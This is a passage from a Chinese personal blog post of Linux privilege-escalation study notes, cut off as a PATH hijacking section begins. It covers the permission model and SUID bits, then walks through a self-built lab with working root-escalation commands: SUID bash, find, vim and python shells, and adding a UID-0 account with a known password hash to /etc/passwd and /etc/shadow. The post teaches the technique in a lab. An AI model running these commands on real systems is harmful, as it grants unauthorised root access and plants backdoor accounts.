<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/atom+xml"><link rel="alternate" type="application/json" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" href="https://zlaryy.top/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="modulepreload" href="/js/nyx-player-HIXTN7KD.js"></link><link rel="modulepreload" href="/js/copy-tex-4AIDXWNJ.js"></link><link rel="modulepreload" href="/js/post-MYXPIC3N.js"></link><link rel="modulepreload" href="/js/chunk-T54OBHW4.js"></link><link rel="modulepreload" href="/js/index.esm-22UB7CNZ.js"></link><link rel="modulepreload" href="/js/chunk-HJSTZ4VX.js"></link><link rel="modulepreload" href="/js/chunk-ALXQBZTY.js"></link><link rel="stylesheet" href="/css/siteInit.css" media="none" onload="this.media&#x3D;&#39;all&#39;"></link><link rel="preload" href="/assets/picture2.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture5.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture6.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture1.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture1.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture4.webp" as="image" fetchpriority="high"><meta name="keywords" content="Web安全"/><meta name="description" content="Web安全 / CTF / 个人学习笔记"/><link rel="canonical" href="https://zlaryy.top/2026/06/19/Linux%E6%8F%90%E6%9D%83/"><link rel="stylesheet" href="/css/post.css?v=0.5.4"><link rel="stylesheet" href="/css/mermaid.css?v=0.5.4"><!-- 临时处理--><link rel="stylesheet" media="none" onload="this.media='all'" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css"><title>Linux提权</title><!-- hexo injector head_end start --><link rel="stylesheet" href="https://npm.elemecdn.com/lxgw-wenkai-screen-webfont/style.css">
<link rel="stylesheet" href="/css/custom.css"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="pagefind_mount"></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Linux提权</h1><div class="meta"><span class="item" title="创建时间：2026-06-19 22:10:00"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2026-06-19T22:10:00+08:00">2026-06-19</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>18k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>16 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">ZLARYY</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" style="background-image: url(&quot;/assets/picture2.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture5.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture6.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture1.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture1.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture4.webp&quot;);"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" data-pagefind-body="data-pagefind-body" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://zlaryy.top/2026/06/19/Linux%E6%8F%90%E6%9D%83/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avertar.png"/><meta itemprop="name" content="ZLARYY"/><meta itemprop="description" content=", Web安全 / CTF / 个人学习笔记"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~"/></span><div class="body md" itemprop="articleBody"><h1 id="linux提权持续更新中"><a class="anchor" href="#linux提权持续更新中">#</a> Linux提权（持续更新中......）</h1>
<p>参考文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/uuzeray/article/details/136098183">【Web】超级详细的Linux权限提升一站式笔记-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/530954889">Linux权限模型详解 - 知乎</a></p>
<h2 id="linux权限模型"><a class="anchor" href="#linux权限模型">#</a> Linux权限模型</h2>
<p>Linux权限模型主要围绕三个组展开：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>U：所有者、用户，user</span></span>
<span class="line"><span>G：用户组，group</span></span>
<span class="line"><span>O：其他人，other</span></span></code></pre>
<p>而每个组又由三个权限位构成：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>r：读权限</span></span>
<span class="line"><span>w：写权限</span></span>
<span class="line"><span>x：可执行权限</span></span></code></pre>
<p>我们可以通过<code>whoami</code>和<code>id</code>查看当前用户和用户所属组以及UID：</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/1.png" class=""></p>
<p>这里表明当前用户：kali，用户UID：1000，主用户组：kali，所在组：kali</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/2.png" class=""></p>
<p>Linux里权限最高的用户是root，root的UID永远是0</p>
<p>Linux中常见的用户有：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>root:超级管理员</span></span>
<span class="line"><span>kali:普通登录用户</span></span>
<span class="line"><span>www-data:web服务用户</span></span>
<span class="line"><span>mysql:MySQL服务用户</span></span>
<span class="line"><span>postgres:PostgreSQL服务用户</span></span>
<span class="line"><span>nobody:极低权限用户</span></span></code></pre>
<h3 id="etcpasswd"><a class="anchor" href="#etcpasswd">#</a> /etc/passwd</h3>
<p>用户信息一般存在<code>/etc/passwd</code>里面，可以通过<code>cat</code>命令查看</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/3.png" class=""></p>
<p>其每一行格式为：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>用户名:密码占位符:UID:GID:描述:用户的主目录:登录shell</span></span></code></pre>
<ul>
<li>用户名：用于区分不同用户，同一系统中登录名是唯一的，在很多系统上该字段被限制在8个字符的长度之内</li>
<li>passwd：用来验证用户的合法性，现在的UNIX/Linux系统中密码不再直接保存在passwd中，通常将passwd文件中的密码字段用一个<code>x</code>来代替，将<code>/etc/shadow</code>作为真正的密码文件，保存包括个人密码在内的数据，当然，shadow文件只有超级用户才有权限读取。<strong>特别的</strong>，如果passwd字段中的第一个字符是<code>*</code>，就表示该账号被查封了，系统不允许持有该账号的用户登录</li>
<li>用户标志号（UID）：是Linux系统中唯一的用户标志，用于区分不同的用户，在系统内部管理进程和文件保护时使用UID字段，在Linux系统中，用户名和UID都可以用来标志用户，只不过对系统来说UID更重要，对用户来说，用户名更方便，在某些特定的目的下，系统中可以存在多个拥有不同登录名而UID相同的用户，事实上，这些使用不同登录名的用户实际上是同一个用户</li>
<li>组标志号（GID）：当前用户的默认工作组标志，具有相似属性的多个用户被分配到同一个组内，每个组都有自己的组名并且以自己的组标志号相区分。UNIX/Linux中的用户可以同时属于多个组，除了在passwd文件中指定其归属基本组，还可以在<code>/etc/group</code>文件中明确地指定某个组包含某用户，使该用户属于多个组</li>
<li>用户的全名或其他描述：包含有关用户的一些信息，如用户的真实姓名、办公室地址、联系电话等。在Linux中，mail和finger等程序用这些信息来标志系统的用户</li>
<li>用户的主目录：定义了个人用户的主目录，当用户登录之后，他的用户将把该目录作为用户的工作目录。在UNIX/Linux系统中，超级用户root的工作目录为<code>/root</code>，而其他个人用户在<code>/home</code>目录下均有自己独立的工作环境，系统在该目录下位每个用户配置了自己的主目录。个人用户的文件都放置在各自的主目录下。通常，管理员使用用户登录名作为用户主目录的名称。多数shell环境使用<code>~</code>来代表该用户的主目录。</li>
<li>登录shell：shell是用户登录系统时运行的程序名称，通常是一个shell程序的全路径名，如<code>/bin/bash</code></li>
</ul>
<p>用户密码哈希一般存在：<code>/etc/shadow</code>中，通过<code>ls -l /etc/shadow</code>可以查看权限</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/4.png" class=""></p>
<p>表示文件属于root，文件组是shadow，root可以读写，shadow组可以读，其他人没有权限</p>
<h3 id="权限位"><a class="anchor" href="#权限位">#</a> 权限位</h3>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/5.png" class=""></p>
<p>随便查看一个文件的权限可以看到<code>-rwxrwxr-x</code></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>-:文件类型</span></span>
<span class="line"><span>第一个rwx:文件所有者权限</span></span>
<span class="line"><span>第二个rxw:所属组权限</span></span>
<span class="line"><span>r-x：其他人权限（不可写）</span></span></code></pre>
<p>在文件类型中：<code>-</code>表示普通文件；<code>d</code>表示目录；<code>|</code>表示软链接；<code>c</code>表示字符设备；<code>b</code>表示块设备</p>
<p>Linux中也常用数字表示权限：<code>r</code>为4；<code>w</code>为2；<code>x</code>为1，所以<code>chmod 777 ex1</code>就是表示将<code>ex1</code>文件的权限修改为<code>-rwxrwxrwx</code>，<code>chmod 755 ex1</code>表示权限修改为<code>-rwxr-xr-x</code></p>
<p>常见权限有：777，755，644，600，700</p>
<p>但是目录权限和文件权限不完全一样，对目录来说，<code>r</code>表示能列出目录内容，<code>w</code>表示能在目录中创建、删除、重命名文件，<code>x</code>表示能进入目录，访问目录里的文件</p>
<p>另外我们了解<code>chown</code>和<code>chgrp</code>命令：</p>
<p><code>chown</code>：修改文件所有者，<code>chown 用户 文件</code></p>
<p><code>chgrp</code>：修改文件所属组，<code>chgrp 用户 文件</code></p>
<p>实现同时修改文件用户和组：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo chown root:root ex1</span></span></code></pre>
<h3 id="用户组"><a class="anchor" href="#用户组">#</a> 用户组</h3>
<p>有些时候不是root用户，但属于某些特殊组，也可能拥有很高权限</p>
<p>查看当前用户所属组的命令是<code>id</code></p>
<p>常见危险用户组：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo:可能可以使用sudo提权</span></span>
<span class="line"><span>docker:可以挂载主机文件系统</span></span>
<span class="line"><span>lxd:可以通过容器挂载根目录提权</span></span>
<span class="line"><span>disk:可能直接读取磁盘</span></span>
<span class="line"><span>adm:可以读取大量日志</span></span>
<span class="line"><span>shadow:可能读取/etc/passwd</span></span>
<span class="line"><span>root:高危</span></span>
<span class="line"><span>staff:某些系统中有额外写权限</span></span></code></pre>
<p>sudo权限：以其他用户身份执行命令，通常是root</p>
<p>查看当前用户能执行什么sudo命令：<code>sudo -l</code></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/6.png" class=""></p>
<p>可以看到：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>User kali may run the following commands:</span></span>
<span class="line"><span>    (ALL : ALL) ALL</span></span></code></pre>
<p>说明这个用户可以执行任意root命令，如果配置错误，比如：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>(root) NOPASSWD: /usr/bin/vim</span></span></code></pre>
<p>表示当前用户可以免密码以root身份运行vim</p>
<h3 id="suid-sgid-sticky-bit"><a class="anchor" href="#suid-sgid-sticky-bit">#</a> SUID、SGID、Sticky Bit</h3>
<p>普通权限是<code>rwx</code>，但Linux还有特殊权限，其中最重要的是<code>SUID</code>，如果一个程序拥有SUID权限，那么谁执行它，它都会以文件所有者的身份运行。如果文件所有者是root，那么普通用户执行它时，也会短暂拥有root权限</p>
<p>比如<code>ls -l /usr/bin/passwd</code></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/7.png" class=""></p>
<p>这里不再是<code>rwx</code>而是<code>rws</code>，里面的<code>s</code>表示的就是<code>SUID</code></p>
<p>普通用户在执行修改密码的命令时，程序需要修改<code>/etc/passwd</code>文件，但是这个文件只有<code>root</code>可写，所以给这个程序设置<code>SUID</code>权限，让普通用户执行passwd时，临时拥有root权限</p>
<p>在上述参考文章中也提到了<code>s</code>权限位：每当一个可执行文件的U类别的权限位出现<code>s</code>，那么这个可执行文件变成做<code>setuid</code>二进制文件。每当一个setuid二进制文件运行时，其相应的进程的EUID便被设置为二进制文件的UID，针对passwd而言，进程的EUID被设置为0，也即使进程具备根权限。故其可以使普通用户更改相应的密码。并且可以通过chown和chmod更改文件的的权限位并设置权限位为s。</p>
<p><strong>注意</strong>：只有可以执行的二进制程序文件才能设定SUID权限，非二进制文件设置SUID权限没有意义；命令执行者要对该程序文件拥有执行权限（x）；命令执行者在执行该程序时获得该程序文件属主的身份；SUID权限只在该程序执行过程中有效</p>
<p><strong>SGID</strong>特殊权限与SUID类似，只不过其代表执行时继承文件所属组身份，权限位表现为<code>-rwxr-sr-x</code></p>
<p><strong>Sticky Bit</strong>特殊权限常见于<code>/tmp</code></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/8.png" class=""></p>
<p>最后的<code>t</code>就是<code>Sticky Bit</code>，他的作用是让所有人可以在<code>/tmp</code>里面创建文件，但是只能删除自己的文件而不能随便删除别人的文件</p>
<p>SUID、SGID、Sticky Bit的数字表示分别为4、2、1</p>
<p><code>chmod 4755 ex1</code>表示给ex1文件设置SUID权限</p>
<p><code>chmod 2755 dir1</code>表示给dir1文件设置SGID权限</p>
<p><code>chmod 1777 /tmp</code>表示给<code>/tmp</code>公共可写目录设置Sticky Bit</p>
<h3 id="进程权限"><a class="anchor" href="#进程权限">#</a> 进程权限</h3>
<p>查看进程：<code>ps aux</code></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/9.png" class=""></p>
<p>如果我们看到的是：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>root       1234  0.0  nginx: master process</span></span>
<span class="line"><span>www-data   1235  0.0  nginx: worker process</span></span></code></pre>
<p>说明nginx主进程是root，工作进程是<code>www-data</code></p>
<p>在Linux中有两个身份：<code>Real UID</code>和<code>Effective UID</code></p>
<p><code>Real UID</code>：真实用户ID，表示谁启动了这个程序</p>
<p><code>Effective UID</code>：有效用户ID，也就是程序实际用谁的权限运行</p>
<p>Linux在判断权限时主要查看<code>euid</code>，也就是<code>Effective UID</code></p>
<h2 id="suid提权"><a class="anchor" href="#suid提权">#</a> SUID提权</h2>
<p>接下来我们正式进入Linux提权，首先学习SUID提权：利用某些二进制文件设置了SUID权限，从而用root权限执行系统命令</p>
<p>设置SUID：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># 设置SUID位</span></span>
<span class="line"><span>chmod u+s filename</span></span>
<span class="line"><span># 去掉SUID设置</span></span>
<span class="line"><span>chmod u-s filename</span></span></code></pre>
<p>如果某一个程序的权限是：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>-rwsr-xr-x 1 root root /usr/local/bin/backup</span></span></code></pre>
<p>那么说明这个程序backup属于root，并且有SUID</p>
<p>如果这个程序内部存在危险代码比如：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>system("sh");</span></span></code></pre>
<p>那么普通用户执行它时这些命令就可以以root权限运行</p>
<p>常见的可以用来提权的命令：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>nmap</span></span>
<span class="line"><span>vim</span></span>
<span class="line"><span>find</span></span>
<span class="line"><span>bash</span></span>
<span class="line"><span>more</span></span>
<span class="line"><span>less</span></span>
<span class="line"><span>nano</span></span>
<span class="line"><span>cp</span></span>
<span class="line"><span>awk</span></span>
<span class="line"><span>mv</span></span></code></pre>
<p>查找SUID文件：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>find / -user root -perm -4000 -print 2>/dev/null</span></span>
<span class="line"><span>find / -perm -u=s -type f 2>/dev/null</span></span>
<span class="line"><span>find / -user root -perm -4000 -exec ls &#123;&#125; \; 2>/dev/null</span></span></code></pre>
<h3 id="本地靶场搭建"><a class="anchor" href="#本地靶场搭建">#</a> 本地靶场搭建</h3>
<p>在我们的虚拟机中执行以下命令：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># 安装相关工具</span></span>
<span class="line"><span>sudo apt update</span></span>
<span class="line"><span>sudo apt install -y gcc make strace ltrace</span></span>
<span class="line"><span></span></span>
<span class="line"><span># 创建低权限用户，用suiduser模拟</span></span>
<span class="line"><span>sudo useradd -m -s /bin/bash suiduser</span></span>
<span class="line"><span>echo 'suiduser:123456' | sudo chpasswd</span></span>
<span class="line"><span></span></span>
<span class="line"><span># 切换为低权限用户，密码为123456</span></span>
<span class="line"><span>su - suiduser</span></span></code></pre>
<p>退出低权限用户是<code>exit</code></p>
<p></p>
<p>用带有sudo权限的用户执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo cp /bin/bash /usr/local/bin/rootbash</span></span>
<span class="line"><span>sudo chown root:root /usr/local/bin/rootbash</span></span>
<span class="line"><span>sudo chmod 4755 /usr/local/bin/rootbash</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/11.png" class=""></p>
<p>这样我们就创建了一个带有SUID权限的<code>/usr/local/bin/rootbash</code></p>
<h3 id="bash提权"><a class="anchor" href="#bash提权">#</a> bash提权</h3>
<p>bash命令是用来打开一个shell，同时它具有执行命令的能力，因此，如果配置为使用SUID权限运行，则可以通过bash执行的命令都将以root身份去运行</p>
<p>这里我们搭建了带有SUID权限的<code>/usr/local/bin/rootbash</code>模拟搜索带有SUID权限文件搜索到<code>/bin/bash</code>的情况，回到低权限用户之后我们尝试执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># -p表示preserve privileges保留权限</span></span>
<span class="line"><span>/usr/local/bin/rootbash -p</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/12.png" class=""></p>
<p>可以看到我们的euid变成了root进程，接下来我们就可以查看低权限用户不可查看的<code>/etc/shadow</code>文件了</p>
<p>正常情况下的提权需要我们用之前提到过的搜索带有<code>SUID</code>权限的文件，然后对搜索到的文件进行分析，重点查案这些字符串里面是否存在：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/bin/sh</span></span>
<span class="line"><span>bash</span></span>
<span class="line"><span>sh</span></span>
<span class="line"><span>cat</span></span>
<span class="line"><span>cp</span></span>
<span class="line"><span>tar</span></span>
<span class="line"><span>find</span></span>
<span class="line"><span>python</span></span>
<span class="line"><span>perl</span></span>
<span class="line"><span>chmod</span></span>
<span class="line"><span>chown</span></span>
<span class="line"><span>system</span></span>
<span class="line"><span>backup</span></span></code></pre>
<h3 id="find提权"><a class="anchor" href="#find提权">#</a> find提权</h3>
<p>find比较常用，find用来在系统中查找文件，同时它也有执行命令的能力，因此如果配置为SUID权限运行则可以通过find执行的命令都将以root身份运行</p>
<p>仿照配置带有SUID的bash文件，我们执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo cp /bin/find /usr/local/bin/rootfind</span></span>
<span class="line"><span>sudo chown root:root /usr/local/bin/rootfind</span></span>
<span class="line"><span>sudo chmod 4755 /usr/local/bin/rootfind</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/13.png" class=""></p>
<p>接下来我们回到低权限用户尝试利用这个带有SUID的文件</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># anyfile文件必须存在</span></span>
<span class="line"><span>touch anyfile</span></span>
<span class="line"><span>/usr/local/bin/rootfind anyfile -exec whoami \;</span></span>
<span class="line"><span>/usr/local/bin/rootfind . -exec /bin/sh -p \; -quit</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/14.png" class=""></p>
<h3 id="vim提权"><a class="anchor" href="#vim提权">#</a> vim提权</h3>
<p>利用vim提权的思路是修改<code>/etc/passwd</code>和<code>/etc/shadow</code>文件为自己添加一个拥有root权限的用户</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo cp /bin/vim /usr/local/bin/supevim</span></span>
<span class="line"><span>sudo chown root:root /usr/local/bin/supevim</span></span>
<span class="line"><span>sudo chmod 4755 /usr/local/bin/supevim</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/15.png" class=""></p>
<p>1.利用vim添加账号：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/bin/supevim /etc/passwd 添加特权用户</span></span>
<span class="line"><span>添加：ZLARYY:x:0:0::/home/root:/bin/bash</span></span>
<span class="line"><span>/usr/local/bin/supevim /etc/shadow 添加特权用户</span></span>
<span class="line"><span>ZLARYY:$1$salt$638tR8bROOvPnPklDQ9Vf/:19103:0:99999:7::: 密码是123456</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/17.png" class=""></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/18.png" class=""></p>
<p>2.利用vim打开交互shell：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/bin/supevim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'</span></span></code></pre>
<p>很多vim不一定支持python，使用这条命令查看：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/bin/supevim --version | grep python</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/19.png" class=""></p>
<p>看到<code>+python</code>或<code>+python2</code>说明支持python，可以用上面的命令打开交互shell</p>
<p>这里是<code>+python3</code>所以命令需要修改为：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/bin/supevim -c ':py3 import os; os.execl("/bin/bash", "bash", "-p")'</span></span>
<span class="line"><span>或者</span></span>
<span class="line"><span>/usr/local/bin/supevim -c ':py3 import os; os.setuid(0); os.setgid(0); os.execl("/bin/bash", "bash", "-p")'</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/20.png" class=""></p>
<h3 id="python提权"><a class="anchor" href="#python提权">#</a> python提权</h3>
<p>如果某个python解释器具有SUID root权限，那么普通用户执行它时，python进程的euid会变成root</p>
<p>同样执行下面三条命令进行模拟：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo cp /bin/python3 /usr/local/bin/rootpython3</span></span>
<span class="line"><span>sudo chown root:root /usr/local/bin/rootpython3</span></span>
<span class="line"><span>sudo chmod 4755 /usr/local/bin/rootpython3</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/21.png" class=""></p>
<p>那么我们可以执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/bin/rootpython3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/22.png" class=""></p>
<h3 id="path路径劫持"><a class="anchor" href="#path路径劫持">#</a> PATH路径劫持</h3>
<p>漏洞存在于：SUID root程序调用外部命令时，没有写绝对路径，例如程序里写了：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>system("backup");</span></span></code></pre>
<p>而不是：</p>
